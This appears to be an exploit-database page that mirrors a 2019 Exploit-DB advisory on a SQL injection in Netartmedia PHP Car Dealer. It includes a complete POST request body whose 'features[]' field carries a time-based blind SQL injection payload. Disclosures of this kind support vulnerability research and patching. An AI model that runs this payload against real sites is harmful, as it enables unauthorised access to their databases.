header-logo
Suggest Exploit
vendor:
PHP Car Dealer
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP Car Dealer
Affected Version From: Latest
Affected Version To: Latest
Patch Exists: NO
Related CWE: N/A
CPE: a:netartmedia:php_car_dealer
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

Netartmedia PHP Car Dealer- SQL Injection

The PHP Car Dealer script is vulnerable to SQL Injection. An attacker can send a malicious payload to the 'features[]' parameter in a POST request to the index.php page, which can be used to inject malicious SQL queries.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

# Exploit Title: Netartmedia  PHP Car Dealer- SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/autodealer/
# Demo Site: https://www.phpscriptdemos.com/autodealer/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
# Description:The PHP Car Dealer script is also using a flexible
template system - the
 templates can be modified or new ones to be created in order to
completely customize the website look and feel.

----- PoC 1 SQLi -----

Request: http://localhost/[PATH]/index.php

Parameter features[] (POST)

Payload:body_style=&car_make=&car_model=1&condition=&exterior_color=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&fuel_type=&max_mileage=&mod=search&only_pictures=1&order_by=date&price_from=1&price_to=1&search_keyword=&search_type=search_form&transmission=&type=1&year=